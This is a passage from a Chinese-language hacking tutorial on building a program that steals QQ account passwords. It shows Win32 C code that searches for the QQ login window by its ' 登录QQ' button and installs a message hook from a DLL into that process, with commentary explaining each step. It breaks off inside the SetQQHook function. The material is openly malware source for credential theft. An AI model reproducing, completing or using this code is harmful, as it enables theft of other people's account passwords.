黑客心得：盗QQ密码的软件模拟实现技术

{

//利用FindWindowEx查找QQ登陆窗口，具体参数意思请查MSDN

g_hQQLogin=FindWindowEx(NULL,g_hQQLogin,"#32770",NULL); //对话框的类都是#32770

//找到类名是#32770后，再在其窗体内找一个具有“ 登录QQ”的BUTTON按纽

hLogin = FindWindowEx(g_hQQLogin, NULL, "Button", " 登录QQ"); //这一句很关键，如果你的QQ登陆窗口上没有" 登录QQ"字样，那么获取密码将失败！

}

while(g_hQQLogin != NULL && hLogin == NULL); //直到找到指定的窗口，即：QQ登陆窗口

if (g_hQQLogin != NULL)

{

SetQQHook(g_hQQLogin);//安装HOOK，此函数在DLL文件中 第二部分中介绍

}

}

上面就是查找QQ登陆窗口句柄的过程，从代码可以看出我用的方法：找一个其子窗体中有一个标题为“ 登录QQ”的BUTTON的对话框（这句话说得有点饶口，这句话如果也看不懂，下面您不用看了：（） 我最开始是想利用 FindWindow(NULL,"QQ用户登陆窗口")来查找，但是我用Spy++看了QQ登陆窗口的标题并不是“QQ用户登陆窗口”，而是“乱码”，其中包含了回车键等特殊字符，于是我用了FindWindowEx().

第二部分：（2）安装钩子

找到了QQ登陆窗口后，就成功了一半。：）

下面是DLL文件中的安装HOOK的函数SetQQHook(), 为什么要用DLL（动态连接库）？要去“钩”其他进程的消息，得让HOOK函数在DLL中，这样好映射到其地址空间中！

BOOL WINAPI SetQQHook(HWND hQQLogin)

{

//获得登陆框的句柄